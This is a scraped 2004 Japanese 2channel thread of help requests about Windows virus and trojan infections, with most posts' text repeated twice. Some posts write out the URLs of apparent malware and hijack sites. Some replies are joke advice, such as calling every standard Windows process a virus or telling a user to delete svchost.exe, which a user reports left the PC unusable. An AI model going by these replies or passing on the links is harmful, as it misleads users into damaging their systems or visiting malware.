これはウィルスですか?
あともう一つ
windowsフォルダ内にtwain_32 というフォルダがあるんですが、
ウィルスですか?
教えてください。お願いします。
460 :名無しさん@お腹いっぱい。:04/09/23 13:57:52
BKDR_SURILA.Bってトロイってのに感染したみたいなんだけど
これってどうやって駆除したらいいんですか?
ウイルスバスターで隔離はしてるんだけど。
OSはXPです
これってどうやって駆除したらいいんですか?
ウイルスバスターで隔離はしてるんだけど。
OSはXPです
461 :名無しさん@お腹いっぱい。:04/09/23 14:19:25
hot_mailに差出人、件名など空白のメールで
ウィルスらしき添付ファイルがあり消そうと思って
チェックボックスにチェックを入れると、他の関係ないメールにまで
全てチェックが入ってしまい消すことができません。
仕方なく別のフォルダに他のメールを移動させてその添付メールだけにして
消そうと思ったら、「このフォルダにはメッセージがありません。」となってて
メールとして認識されてないようなんですがこのメールを消すにはどうしたらいいのでしょうか?
ウィルスらしき添付ファイルがあり消そうと思って
チェックボックスにチェックを入れると、他の関係ないメールにまで
全てチェックが入ってしまい消すことができません。
仕方なく別のフォルダに他のメールを移動させてその添付メールだけにして
消そうと思ったら、「このフォルダにはメッセージがありません。」となってて
メールとして認識されてないようなんですがこのメールを消すにはどうしたらいいのでしょうか?
462 :名無しさん@お腹いっぱい。:04/09/23 14:49:44
>459
ウイルスかと疑うならウイルスチェックしてください
アンチウイルスソフトをもってなければオンラインスキャンでもどうぞ
>460
まずは>85-86をどうぞ
ウイルスかと疑うならウイルスチェックしてください
アンチウイルスソフトをもってなければオンラインスキャンでもどうぞ
>460
まずは>85-86をどうぞ
463 :名無しさん@お腹いっぱい。:04/09/23 16:32:31
>>461
2階の窓から放り投げれば消える
2階の窓から放り投げれば消える
464 :名無しさん@お腹いっぱい。:04/09/23 16:53:04
465 :名無しさん@お腹いっぱい。:04/09/23 17:33:36
ウィルスソフトで修復できないウィルスってありますか?
466 :名無しさん@お腹いっぱい。:04/09/23 17:34:18
ウイルスソフトじゃなぁ
467 :名無しさん@お腹いっぱい。:04/09/23 18:03:47
http://gb.bbs.ws/book.php?book=gall1
これ踏んでしまったのですが、感染してるか確認するにはどうすればいいのですか?
スタートアップみても特に追加されてなかったので・・
環境はWinXpでブラウザはIE6(sp2なし)です
アップデートはSP2以外入れてあります
これ踏んでしまったのですが、感染してるか確認するにはどうすればいいのですか?
スタートアップみても特に追加されてなかったので・・
環境はWinXpでブラウザはIE6(sp2なし)です
アップデートはSP2以外入れてあります
468 :名無しさん@お腹いっぱい。:04/09/23 18:11:23
>467
地雷サイトに直リンすんな!
これ踏んで被害者が出たらどうすんだ
アンチウイルスソフト入れてなければ
TrendmicroでもSymantecでもMcAfeeでもいいから
サイト行ってオンラインスキャンして来い
地雷サイトに直リンすんな!
これ踏んで被害者が出たらどうすんだ
アンチウイルスソフト入れてなければ
TrendmicroでもSymantecでもMcAfeeでもいいから
サイト行ってオンラインスキャンして来い
469 :名無しさん@お腹いっぱい。:04/09/23 18:18:31
>>465
BCG
BCG
470 :名無しさん@お腹いっぱい。:04/09/23 19:06:22
>>467
氏ね!
氏ね!
471 :名無しさん@お腹いっぱい。:04/09/23 19:15:01
うっせーばか
472 :名無しさん@お腹いっぱい。:04/09/23 20:40:53
473 :名無しさん@お腹いっぱい。:04/09/23 21:21:37
>>473
市ね
市ね
474 :名無しさん@お腹いっぱい。:04/09/23 21:23:25
475 :名無しさん@お腹いっぱい。:04/09/23 21:33:49
476 :名無しさん@お腹いっぱい。:04/09/23 21:44:36
【使用OS】 WindowsXP Home
【WindowsUpdateしてるか】 はい
【AntiVirusは何を使っているか】 ウィルスバスター2004
【Updateしてるか】 はい
【ウイルス名】 BKDR AGENT.K (SYSTEM32内の.dllファイルで発見)
【症状を具体的に、分かる限りすべて書く】
その.dllファイルにマウスカーソルをあてて選択状態にした時と、
Internet Explorerを起動した時にウィルス発見のメッセージが出る。
しかも『隔離できませんでした』と。
【何をしたらそんなことになったのか】
普通に常時接続で
【これまでにとった措置】
その.dllファイルを削除しようとしてもエラーメッセージが出て失敗。
こんな状態なんですが、どうしたら削除できますかね?
【WindowsUpdateしてるか】 はい
【AntiVirusは何を使っているか】 ウィルスバスター2004
【Updateしてるか】 はい
【ウイルス名】 BKDR AGENT.K (SYSTEM32内の.dllファイルで発見)
【症状を具体的に、分かる限りすべて書く】
その.dllファイルにマウスカーソルをあてて選択状態にした時と、
Internet Explorerを起動した時にウィルス発見のメッセージが出る。
しかも『隔離できませんでした』と。
【何をしたらそんなことになったのか】
普通に常時接続で
【これまでにとった措置】
その.dllファイルを削除しようとしてもエラーメッセージが出て失敗。
こんな状態なんですが、どうしたら削除できますかね?
477 :名無しさん@お腹いっぱい。:04/09/23 22:18:42
478 :名無しさん@お腹いっぱい。:04/09/23 22:39:32
>>479
市ね
市ね
479 :名無しさん@お腹いっぱい。:04/09/23 22:50:45
なんで死ななきゃいけないの?
480 :名無しさん@お腹いっぱい。:04/09/23 23:15:09
>>481
市ぬ
市ぬ
481 :名無しさん@お腹いっぱい。:04/09/23 23:18:53
【使用OS】 WindowsXP Home
【WindowsUpdateしてるか】 してません
【AntiVirusは何を使っているか】 ノートン2004
【Updateしてるか】 してません
【ウイルス名】 Unix.Penguin こんなんが次々と
【症状を具体的に、分かる限りすべて書く】
ブラウザのホームページが
http://213.159.117.134/index.php
になっていました。インターネットオプションで設定変えようとしても
こっちのほうが便利だというような英語のウィンドウがでて変更できません。
2ちゃん見たりは普通にできます。
【何をしたらそんなことになったのか】
愚息がエロサイト拝見しておりました
【これまでにとった措置】
スキャンしたりいまさらウィンドウズアップデイトしたりしましたが
状況は変わりません。
識者の方ご指導お願いします。
【WindowsUpdateしてるか】 してません
【AntiVirusは何を使っているか】 ノートン2004
【Updateしてるか】 してません
【ウイルス名】 Unix.Penguin こんなんが次々と
【症状を具体的に、分かる限りすべて書く】
ブラウザのホームページが
http://213.159.117.134/index.php
になっていました。インターネットオプションで設定変えようとしても
こっちのほうが便利だというような英語のウィンドウがでて変更できません。
2ちゃん見たりは普通にできます。
【何をしたらそんなことになったのか】
愚息がエロサイト拝見しておりました
【これまでにとった措置】
スキャンしたりいまさらウィンドウズアップデイトしたりしましたが
状況は変わりません。
識者の方ご指導お願いします。
482 :やちゃた:04/09/23 23:21:40
みなさんの知恵を貸してください。
調べることは調べたのですが、対抗策がいっこうに見つからないのです。
OS:2000
症状:とあるゲーム(居昇殿?)の最中急に重くなり、
次からそのゲームを立ち上げるたびにウィルスバスター2004から
名BKDR_SURILA.B 場所C:\WINDOWS\system32\SVKP.sys
のウィルス隔離の表示が出ます。
推測:ゲームからとか、ゲーム内に規制したのではなく、画面を変更?するときに
活動してるのかなー
やったこと:これが間違った。レジストリーをいじってしまいました。
調べに調べたが同名のウイルスの情報が見つからず、
丸1日使ってとうとう、軽はずみに
えーい!怪しいのは全部削除だ!!としてしまい
ウイルスは残ったままで、ワード、エクセル、メール送信
ができなくなってしまった。私はおおうつけです。
オフィスのCDも受け付けてくれない....
皆さんに助けてほしいこと:私の失敗で動かなくなったものは自己責任
しかし、この BKDR_SURILA.B とやらの
正体と対策を教えていただきたい。
お願いします。
調べることは調べたのですが、対抗策がいっこうに見つからないのです。
OS:2000
症状:とあるゲーム(居昇殿?)の最中急に重くなり、
次からそのゲームを立ち上げるたびにウィルスバスター2004から
名BKDR_SURILA.B 場所C:\WINDOWS\system32\SVKP.sys
のウィルス隔離の表示が出ます。
推測:ゲームからとか、ゲーム内に規制したのではなく、画面を変更?するときに
活動してるのかなー
やったこと:これが間違った。レジストリーをいじってしまいました。
調べに調べたが同名のウイルスの情報が見つからず、
丸1日使ってとうとう、軽はずみに
えーい!怪しいのは全部削除だ!!としてしまい
ウイルスは残ったままで、ワード、エクセル、メール送信
ができなくなってしまった。私はおおうつけです。
オフィスのCDも受け付けてくれない....
皆さんに助けてほしいこと:私の失敗で動かなくなったものは自己責任
しかし、この BKDR_SURILA.B とやらの
正体と対策を教えていただきたい。
お願いします。
483 :名無しさん@お腹いっぱい。:04/09/23 23:26:38
>>482
大ジョブだ、気にスンナ
大ジョブだ、気にスンナ
484 :名無しさん@お腹いっぱい。:04/09/23 23:53:28
485 :名無しさん@お腹いっぱい。:04/09/23 23:57:20
>>481
えーとですね、その使用環境だとウイルスやワームやトロイや
スパイウエアやアドウエアやらにかなりやられてると思いますので
OS再インストールした方が手っ取り早いと、私は思います。
>>482
最新パターンファイルに乗ってるぐらい新しい奴だから解説もなし。
解説できるまでマターリ待っとけ。
えーとですね、その使用環境だとウイルスやワームやトロイや
スパイウエアやアドウエアやらにかなりやられてると思いますので
OS再インストールした方が手っ取り早いと、私は思います。
>>482
最新パターンファイルに乗ってるぐらい新しい奴だから解説もなし。
解説できるまでマターリ待っとけ。
486 :名無しさん@お腹いっぱい。:04/09/24 00:06:27
hot_mailに差出人、件名など空白のメールで
ウィルスらしき添付ファイルがあり消そうと思って
チェックボックスにチェックを入れると、他の関係ないメールにまで
全てチェックが入ってしまい消すことができません。
仕方なく別のフォルダに他のメールを移動させてその添付メールだけにして
消そうと思ったら、「このフォルダにはメッセージがありません。」となってて
メールとして認識されてないようなんですがこのメールを消すにはどうしたらいいのでしょうか?
ウィルスらしき添付ファイルがあり消そうと思って
チェックボックスにチェックを入れると、他の関係ないメールにまで
全てチェックが入ってしまい消すことができません。
仕方なく別のフォルダに他のメールを移動させてその添付メールだけにして
消そうと思ったら、「このフォルダにはメッセージがありません。」となってて
メールとして認識されてないようなんですがこのメールを消すにはどうしたらいいのでしょうか?
>>482
駆除はざっくり逝ってpandaのオンラインスキャン、
hostファイル&レジストリ掃除
烏賊サイトに書いてあるからじっくり読む
(当然性質も書いてある)
ttp://www.pandasoftware.com/virus_info/encyclopedia/overview.aspx?lst=vis&idvirus=51005
ttp://www.sophos.com/virusinfo/analyses/w32surilab.html
英語読めないなら翻訳サイト経由で読む
駆除はざっくり逝ってpandaのオンラインスキャン、
hostファイル&レジストリ掃除
烏賊サイトに書いてあるからじっくり読む
(当然性質も書いてある)
ttp://www.pandasoftware.com/virus_info/encyclopedia/overview.aspx?lst=vis&idvirus=51005
ttp://www.sophos.com/virusinfo/analyses/w32surilab.html
英語読めないなら翻訳サイト経由で読む
488 :名無しさん@お腹いっぱい。:04/09/24 00:50:34
>>486
基本的にHotmailにはウィルスは来ないんだよねむ
基本的にHotmailにはウィルスは来ないんだよねむ
489 :名無しさん@お腹いっぱい。:04/09/24 00:51:32
すんません、教えていただきたいです。
自分はサイトが作れる程度のHTMLしか知らん、Win2000を使っている者です。
最近ウィルスに感染してウィルスバスターで一応駆除したのですが、
キンタマに感染してたのかどうか不安です。
苺キンタマなどのウィルスに感染していない通常のとき、
タスクマネージャーのプロセスにexeファイルが表示されることはあるんでしょうか?
今表示されているexeは下です。
SMSS.EXE CSRSS.EXE WINLOGON.EXE LSASS.EXE
svchost.exe spoolsv.exe Ctsvccda.exe svchost.exe
regsvc.exe mstask.exe WinMgmt.exe mspmspsv.exe
svchost.exe tmproxy.exe imejpmgr.exe svchost.exe
realsched.exe explorer.exe NewsUpd.exe internat.exe
BsCLiP.exe OSA.EXE PCCPFW.exe conime.exe
YPagerJ.exe Tmntsrv.exe PCClient.exe pccguide.exe
TMOAgent.exe IEXPLORE.EXE TASKMGR.EXE
自分はサイトが作れる程度のHTMLしか知らん、Win2000を使っている者です。
最近ウィルスに感染してウィルスバスターで一応駆除したのですが、
キンタマに感染してたのかどうか不安です。
苺キンタマなどのウィルスに感染していない通常のとき、
タスクマネージャーのプロセスにexeファイルが表示されることはあるんでしょうか?
今表示されているexeは下です。
SMSS.EXE CSRSS.EXE WINLOGON.EXE LSASS.EXE
svchost.exe spoolsv.exe Ctsvccda.exe svchost.exe
regsvc.exe mstask.exe WinMgmt.exe mspmspsv.exe
svchost.exe tmproxy.exe imejpmgr.exe svchost.exe
realsched.exe explorer.exe NewsUpd.exe internat.exe
BsCLiP.exe OSA.EXE PCCPFW.exe conime.exe
YPagerJ.exe Tmntsrv.exe PCClient.exe pccguide.exe
TMOAgent.exe IEXPLORE.EXE TASKMGR.EXE
490 :名無しさん@お腹いっぱい。:04/09/24 00:54:13
>>489
SMSS.EXE CSRSS.EXE WINLOGON.EXE LSASS.EXE
svchost.exe spoolsv.exe Ctsvccda.exe svchost.exe
regsvc.exe mstask.exe WinMgmt.exe mspmspsv.exe
svchost.exe tmproxy.exe imejpmgr.exe svchost.exe
realsched.exe explorer.exe NewsUpd.exe internat.exe
BsCLiP.exe OSA.EXE PCCPFW.exe conime.exe
YPagerJ.exe Tmntsrv.exe PCClient.exe pccguide.exe
TMOAgent.exe IEXPLORE.EXE TASKMGR.EXE
残念ながら全てウィルスです
SMSS.EXE CSRSS.EXE WINLOGON.EXE LSASS.EXE
svchost.exe spoolsv.exe Ctsvccda.exe svchost.exe
regsvc.exe mstask.exe WinMgmt.exe mspmspsv.exe
svchost.exe tmproxy.exe imejpmgr.exe svchost.exe
realsched.exe explorer.exe NewsUpd.exe internat.exe
BsCLiP.exe OSA.EXE PCCPFW.exe conime.exe
YPagerJ.exe Tmntsrv.exe PCClient.exe pccguide.exe
TMOAgent.exe IEXPLORE.EXE TASKMGR.EXE
残念ながら全てウィルスです
491 :名無しさん@お腹いっぱい。:04/09/24 00:58:00
>>489
ここにタスクリストがある。英語だけど大体の意味は辞書引きながら
わかるはず。
ttp://www.answersthatwork.com/Tasklist_pages/tasklist.htm
ここにタスクリストがある。英語だけど大体の意味は辞書引きながら
わかるはず。
ttp://www.answersthatwork.com/Tasklist_pages/tasklist.htm
492 :名無しさん@お腹いっぱい。:04/09/24 00:59:20
ログリスト
"時刻","検索の種類","種類","ウイルス名","感染元","ウイルス検出時の処理","ウイルス駆除できない場合の処理"
"00:18","受信メール検索","e-mail","HTML_Netsky.P","Mail Delivery System <[email protected]> ""Mail delivery failed: returning message to sender""","ウイルス駆除 できません","削除 できません"
"00:18","受信メール検索","e-mail","WORM_NETSKY.P","Mail Delivery System <[email protected]> ""Mail delivery failed: returning message to sender""","ウイルス駆除 できません","削除 できません"
この2個のメール受信後メール送るたびに添え付けFILEが自動添付されるようになり
困ってます、、
この場合の対処法ご存知の方ご教授おねがいします。
"時刻","検索の種類","種類","ウイルス名","感染元","ウイルス検出時の処理","ウイルス駆除できない場合の処理"
"00:18","受信メール検索","e-mail","HTML_Netsky.P","Mail Delivery System <[email protected]> ""Mail delivery failed: returning message to sender""","ウイルス駆除 できません","削除 できません"
"00:18","受信メール検索","e-mail","WORM_NETSKY.P","Mail Delivery System <[email protected]> ""Mail delivery failed: returning message to sender""","ウイルス駆除 できません","削除 できません"
この2個のメール受信後メール送るたびに添え付けFILEが自動添付されるようになり
困ってます、、
この場合の対処法ご存知の方ご教授おねがいします。
493 :名無しさん@お腹いっぱい。:04/09/24 01:10:54
495 :名無しさん@お腹いっぱい。:04/09/24 01:20:30
>493
これで解らないのがあったら>491さんので・・・と参考までに
ttp://www003.upp.so-net.ne.jp/shigeri/speedup/speedup1.html
ttp://homepage2.nifty.com/tomokatsu/tech07.html
これで解らないのがあったら>491さんので・・・と参考までに
ttp://www003.upp.so-net.ne.jp/shigeri/speedup/speedup1.html
ttp://homepage2.nifty.com/tomokatsu/tech07.html
496 :名無しさん@お腹いっぱい。:04/09/24 01:21:48
>493
載ってなくてウイルスかどうかを判断するにはググるのが一番良い
載ってなくてウイルスかどうかを判断するにはググるのが一番良い
497 :名無しさん@お腹いっぱい。:04/09/24 01:21:51
ウィルスに感染してる時に
自分のデスクトップにある画像やらをCD-RWに保存した場合、何か問題はありますか?
自分のデスクトップにある画像やらをCD-RWに保存した場合、何か問題はありますか?
498 :名無しさん@お腹いっぱい。:04/09/24 01:26:09
499 :名無しさん@お腹いっぱい。:04/09/24 01:26:21
>497
何らかの形で実行しなければ問題ない
何らかの形で実行しなければ問題ない
500 :名無しさん@お腹いっぱい。:04/09/24 01:51:56
501 :名無しさん@お腹いっぱい。:04/09/24 01:54:06
すいません、>>482と同じウイルスにかかったことがトレンドマイクロのオンラインスキャンで分かったのですが・・・
ゲーム中、急にブルースクリーンになって、スキャンしてみたんですが、なにをしているウイルスなのか説明が無くとても不安なんです。
調べてみても、バックドアを作られてコンピュータの情報が見られてしまうくらいしかわかりませんでした。
そしてpandaのオンラインスキャンで駆除を試みたのですが、こちらでは検出されませんでした。
このウイルスはどのようにして削除すればよいのでしょうか?
また、放っておくとどうなってしまうのでしょう?
ゲーム中、急にブルースクリーンになって、スキャンしてみたんですが、なにをしているウイルスなのか説明が無くとても不安なんです。
調べてみても、バックドアを作られてコンピュータの情報が見られてしまうくらいしかわかりませんでした。
そしてpandaのオンラインスキャンで駆除を試みたのですが、こちらでは検出されませんでした。
このウイルスはどのようにして削除すればよいのでしょうか?
また、放っておくとどうなってしまうのでしょう?
502 :名無しさん@お腹いっぱい。:04/09/24 02:10:49
ウィルスバスターが「ウィルスに感染したので自動修復しました」
ってなったんですけど、ウィルス名「DEADLINK」ってどんなやつでしょうか?
トレンドマイクロのデータベースで調べてもでてこないので・・・
ってなったんですけど、ウィルス名「DEADLINK」ってどんなやつでしょうか?
トレンドマイクロのデータベースで調べてもでてこないので・・・
503 :名無しさん@お腹いっぱい。:04/09/24 02:34:32
>>502
ウイルスじゃなくて、死んでるレジストリ消すだけみたい。
ttp://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=DEADLINK
ウイルスじゃなくて、死んでるレジストリ消すだけみたい。
ttp://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=DEADLINK
504 :名無しさん@お腹いっぱい。:04/09/24 02:57:51
505 :名無しさん@お腹いっぱい。:04/09/24 02:58:22
すいません質問です
今日初めてPandaでオンラインスキャンしてたとき
avast!のスクリーンセーバーでスキャンするやつも始まって
Pandaのオンラインスキャンの始めにダウソされるファイルに
Win32:Kuang2が検出されたのですがこれは大丈夫でしょうか?
調べたらバックドアトロイの木馬で、スキャンの為に入れられたのかな?とおもったんですが不安です。
ちなみにOSはWin98でAD-awareSEとSpybotとSpywerBlasterとOutpostが他にはいってます
今日初めてPandaでオンラインスキャンしてたとき
avast!のスクリーンセーバーでスキャンするやつも始まって
Pandaのオンラインスキャンの始めにダウソされるファイルに
Win32:Kuang2が検出されたのですがこれは大丈夫でしょうか?
調べたらバックドアトロイの木馬で、スキャンの為に入れられたのかな?とおもったんですが不安です。
ちなみにOSはWin98でAD-awareSEとSpybotとSpywerBlasterとOutpostが他にはいってます
506 :名無しさん@お腹いっぱい。:04/09/24 03:17:58
名前: 名無しさん
内容:
デスノートが最終話だってさ
ttp://strawberry.web-sv.com/cgi/up/ia/up1360.zip
中身は来週のジャンプ詰め合わせだ
↑
不覚にも、これexe.file(すでに404)を踏んでしまいました。
スキャンしてウィルスではなかったのはいいが、
ファイル削除したのに、 いまだに処理速度が遅いままなのです。
このexeをゴミ箱に捨てようとしたら、削除できないって出たけど、
電源入れなおしたら、削除できました。 その後、インターネットオプションで
クッキーやらファイルの削除も全部したけれども、 遅いままなのです。
エクスプローラで「exe」を検索して確答したものがあったんで、
一つ消したけど、遅いまま。「prefetch」とか書かれてたような。
もう削除してよく覚えてないけど。 根源は絶ったのですが、
それに付随するファイル等がどれなのか分かりません。
それらのファイルが処理を遅くしているはずなのですが、
その探し方が分かりません。 _| ̄|○
誰か元に戻すやり方を知りませんか?
ちなみにOSはXPです。
内容:
デスノートが最終話だってさ
ttp://strawberry.web-sv.com/cgi/up/ia/up1360.zip
中身は来週のジャンプ詰め合わせだ
↑
不覚にも、これexe.file(すでに404)を踏んでしまいました。
スキャンしてウィルスではなかったのはいいが、
ファイル削除したのに、 いまだに処理速度が遅いままなのです。
このexeをゴミ箱に捨てようとしたら、削除できないって出たけど、
電源入れなおしたら、削除できました。 その後、インターネットオプションで
クッキーやらファイルの削除も全部したけれども、 遅いままなのです。
エクスプローラで「exe」を検索して確答したものがあったんで、
一つ消したけど、遅いまま。「prefetch」とか書かれてたような。
もう削除してよく覚えてないけど。 根源は絶ったのですが、
それに付随するファイル等がどれなのか分かりません。
それらのファイルが処理を遅くしているはずなのですが、
その探し方が分かりません。 _| ̄|○
誰か元に戻すやり方を知りませんか?
ちなみにOSはXPです。
507 :名無しさん@お腹いっぱい。:04/09/24 03:20:53
508 :名無しさん@お腹いっぱい。:04/09/24 03:21:01
509 :名無しさん@お腹いっぱい。:04/09/24 03:23:12
>>506
すいません。ageてしまいました。
処理の遅さについてですが、ブラウザ、
ワード、エクセルなど、立ち上げる際の
速度が異常に遅くなりました。
警告マークで「shellsystem リストのインデックスが
範囲を超えています(0)」としばしば表示されます。
すいません。ageてしまいました。
処理の遅さについてですが、ブラウザ、
ワード、エクセルなど、立ち上げる際の
速度が異常に遅くなりました。
警告マークで「shellsystem リストのインデックスが
範囲を超えています(0)」としばしば表示されます。
510 :名無しさん@お腹いっぱい。:04/09/24 03:25:25
>509
タスクマネージャーは?
タスクマネージャーは?
511 :名無しさん@お腹いっぱい。:04/09/24 03:26:52
>>508さん
すいません、どういう意味でしょうか?
その時はlive2chを使っていて、スレから直接ダウンロードしました。
自業自得なんですが、ファイルの安全を確認する前に
解凍してしまいました(デスクトップに表示された)。
すいません、どういう意味でしょうか?
その時はlive2chを使っていて、スレから直接ダウンロードしました。
自業自得なんですが、ファイルの安全を確認する前に
解凍してしまいました(デスクトップに表示された)。
512 :名無しさん@お腹いっぱい。:04/09/24 03:26:56
513 :名無しさん@お腹いっぱい。:04/09/24 03:32:36
>505
こんなのみっけた
57 :51 :04/06/23 00:13 ID:???
>>54
その通りでした・・・_| ̄|○
PandaのインターネットセキュリティをDLしていたら
Win32:Kuang2っていうやつとWin95:Matyas
というのも一緒にもらっていました。アンチウィルス
ソフトをDLして、ウィルスも一緒につけてくれるとは
なんて親切な企業なんだ。感動した!!
こんなのみっけた
57 :51 :04/06/23 00:13 ID:???
>>54
その通りでした・・・_| ̄|○
PandaのインターネットセキュリティをDLしていたら
Win32:Kuang2っていうやつとWin95:Matyas
というのも一緒にもらっていました。アンチウィルス
ソフトをDLして、ウィルスも一緒につけてくれるとは
なんて親切な企業なんだ。感動した!!
514 :名無しさん@お腹いっぱい。:04/09/24 03:33:20
>>512
タスクマネージャーの存在自体知りませんでした。
今見たら、CPUが100%になっていました。
プロセスを見たんですが、どれを削っていいのか
分かりません。shellsystem.exeやOmgtray.exe.や
QCONSVC.EXEやsvchost.exeなどまったく身に覚えのないやつは
削除しても何の悪影響はでませんか?
タスクマネージャーの存在自体知りませんでした。
今見たら、CPUが100%になっていました。
プロセスを見たんですが、どれを削っていいのか
分かりません。shellsystem.exeやOmgtray.exe.や
QCONSVC.EXEやsvchost.exeなどまったく身に覚えのないやつは
削除しても何の悪影響はでませんか?
515 :名無しさん@お腹いっぱい。:04/09/24 03:34:01
RegCleaner(レジストリを整理するソフト)を使って、
特定のレジストリを消去しようとすると、物理、仮想メモリ、共に満タンになってしまいます。
これはウイルスなのでしょうか?アンチウイルスソフトで引っかかりませんでしたし、
WindowsUpdateも先日済ませたばかりです。
それと、この件に関係するとは思うのですが、MP3エンコーダーの処理速度が落ちましたし、
MP3タグ管理ソフトで、一括でタグ情報を変更しようとすると、これまた前よりも時間が掛かるようになりました。
一体何が原因なのでしょうか?
特定のレジストリを消去しようとすると、物理、仮想メモリ、共に満タンになってしまいます。
これはウイルスなのでしょうか?アンチウイルスソフトで引っかかりませんでしたし、
WindowsUpdateも先日済ませたばかりです。
それと、この件に関係するとは思うのですが、MP3エンコーダーの処理速度が落ちましたし、
MP3タグ管理ソフトで、一括でタグ情報を変更しようとすると、これまた前よりも時間が掛かるようになりました。
一体何が原因なのでしょうか?
516 :名無しさん@お腹いっぱい。:04/09/24 03:35:45
>>514
svchost.exeはすぐ消すべし
svchost.exeはすぐ消すべし
517 :名無しさん@お腹いっぱい。:04/09/24 03:39:26
518 :名無しさん@お腹いっぱい。:04/09/24 03:41:00
519 :名無しさん@お腹いっぱい。:04/09/24 03:42:29
svchost関連のウイルスは有るけどそれに感染してる事は無いかもしれないし
消す必要が無い、消してもPCが動かなくなる事は無いがネットするのにに何らかの支障が出る
消す必要が無い、消してもPCが動かなくなる事は無いがネットするのにに何らかの支障が出る
520 :名無しさん@お腹いっぱい。:04/09/24 03:43:09
≫517
パソコンが動かなくなりました 携帯から書き込んでます
たすけてください
パソコンが動かなくなりました 携帯から書き込んでます
たすけてください
521 :名無しさん@お腹いっぱい。:04/09/24 03:44:06
( ´,_ゝ`)
522 :名無しさん@お腹いっぱい。:04/09/24 03:45:39
>>516さん
どのexeファイルが危険なのか、どうやって判断するのでしょうか?
どこかサイトを参照してますか?他にも
SPTISRV.exe、shellsystem、Omgtray、WinCinemaMgr
svchost、QCONSVC、ctfmon、mdn、avgserv、LEXPPS
spoolsv、avgcc32、rnathchk、qttask、ibmpmsvc
Isass、services、winlogon、csrss、smss、tp4serv
igfxtray、LTSMMSG、alg、hkcmd、realsched
不明なファイルがずらりと。どれ削っていいのでしょう?
すいません、何も分からなくて。
どのexeファイルが危険なのか、どうやって判断するのでしょうか?
どこかサイトを参照してますか?他にも
SPTISRV.exe、shellsystem、Omgtray、WinCinemaMgr
svchost、QCONSVC、ctfmon、mdn、avgserv、LEXPPS
spoolsv、avgcc32、rnathchk、qttask、ibmpmsvc
Isass、services、winlogon、csrss、smss、tp4serv
igfxtray、LTSMMSG、alg、hkcmd、realsched
不明なファイルがずらりと。どれ削っていいのでしょう?
すいません、何も分からなくて。
523 :名無しさん@お腹いっぱい。:04/09/24 03:50:38
>>522
全部ぐぐって見れば?
全部ぐぐって見れば?
524 :名無しさん@お腹いっぱい。:04/09/24 03:50:52
>>518さん
容量多い順に並べると、
iexplore.exe(24,298K)>live2ch(24,780)>svchost(22,624)
>explore(21,376)>Omgtray(11,836)>shellsystem(7,356)
>csrss(7,208)>以下略
こんな感じです。
容量多い順に並べると、
iexplore.exe(24,298K)>live2ch(24,780)>svchost(22,624)
>explore(21,376)>Omgtray(11,836)>shellsystem(7,356)
>csrss(7,208)>以下略
こんな感じです。
525 :名無しさん@お腹いっぱい。:04/09/24 03:54:38
526 :505:04/09/24 03:57:17
うほっ
>513さんサンクス
俺も感動したよ、ほかのPandaでスキャンした人はどうしてるんですか?
>513さんサンクス
俺も感動したよ、ほかのPandaでスキャンした人はどうしてるんですか?
527 :名無しさん@お腹いっぱい。:04/09/24 04:00:20
528 :名無しさん@お腹いっぱい。:04/09/24 04:02:54
529 :名無しさん@お腹いっぱい。:04/09/24 04:16:34
把握できないぐらいプロセス多くて迷うならOS再インスコした方がいいよ
これからアプリを一つインスコする度にタスク(増えたプロセス)確認してチェックしとけばいい
不具合あったときにほぼ即解決できるし
これからアプリを一つインスコする度にタスク(増えたプロセス)確認してチェックしとけばいい
不具合あったときにほぼ即解決できるし
530 :名無しさん@お腹いっぱい。:04/09/24 04:18:12
ソートしろよ
531 :名無しさん@お腹いっぱい。:04/09/24 04:36:01
shellsystemを消したら、速度が戻ったんですが、
再起動したら、復活してました。_| ̄|○
タスクマネージャーからまた削除しようとしたのですが、
今度は削除できなくなりました。
OSインストールしなおしたら、いらないもの全部消えますか?
再起動したら、復活してました。_| ̄|○
タスクマネージャーからまた削除しようとしたのですが、
今度は削除できなくなりました。
OSインストールしなおしたら、いらないもの全部消えますか?
532 :名無しさん@お腹いっぱい。:04/09/24 04:37:41
>531
hai
hai
533 :名無しさん@お腹いっぱい。:04/09/24 04:38:54
534 :名無しさん@お腹いっぱい。:04/09/24 04:42:10
osはユニクスですか・・・?
535 :名無しさん@お腹いっぱい。:04/09/24 04:51:33
XPの「システムの復元」をやってみたんですが、
未完了と出て、失敗しました。
どうやったら、shellsystemを消すことが出来るでしょうか?
未完了と出て、失敗しました。
どうやったら、shellsystemを消すことが出来るでしょうか?
536 :名無しさん@お腹いっぱい。:04/09/24 05:27:47
>>460と同じウィルスにかかりました。BKDR_SURILA.Bってやつです
トレンドマイクロのオンラインスキャンで、感染ファイルを3箇所発見したんですが
どこのデータベースにも載っておらず、駆除方法がよくわかりません。
感染していたファイル名でググったら、
Win-Trojan/MyDoom.234496っていうワームの解説が見つかって、そこにあった
Windows システムフォルダ SVKP.sys (2,368 バイト)
というのが一致したのですが、これも該当するデータベースがほとんどありませんでした…
紹介されていたページのセキュリティソフトを購入すれば大丈夫なのでしょうけども(2社しかありませんでしたが…)、
手動駆除はできるんでしょうか?
トレンドマイクロのオンラインスキャンで、感染ファイルを3箇所発見したんですが
どこのデータベースにも載っておらず、駆除方法がよくわかりません。
感染していたファイル名でググったら、
Win-Trojan/MyDoom.234496っていうワームの解説が見つかって、そこにあった
Windows システムフォルダ SVKP.sys (2,368 バイト)
というのが一致したのですが、これも該当するデータベースがほとんどありませんでした…
紹介されていたページのセキュリティソフトを購入すれば大丈夫なのでしょうけども(2社しかありませんでしたが…)、
手動駆除はできるんでしょうか?
537 :名無しさん@お腹いっぱい。:04/09/24 05:28:20
538 :名無しさん@お腹いっぱい。:04/09/24 05:35:56
すみません、検索したはずだったのに>>482を見落としてました…
手動だけでは難しいみたいですね、失礼しました。
手動だけでは難しいみたいですね、失礼しました。
539 :名無しさん@お腹いっぱい。:04/09/24 05:46:55
やっとshellsystem消えてくれました。
手動で消したんですが、今回は復活しませんでした。
また復活しそうで怖い。
でも、まだよく分からないexeファイルがいっぱいあるので、
CD見つかり次第、OSを再インスト−ルし直します。
とりあえず機能が戻ったんで、ちょっと嬉しいです。
助言くれた方に再度感謝します。
手動で消したんですが、今回は復活しませんでした。
また復活しそうで怖い。
でも、まだよく分からないexeファイルがいっぱいあるので、
CD見つかり次第、OSを再インスト−ルし直します。
とりあえず機能が戻ったんで、ちょっと嬉しいです。
助言くれた方に再度感謝します。
540 :名無しさん@お腹いっぱい。:04/09/24 06:24:03
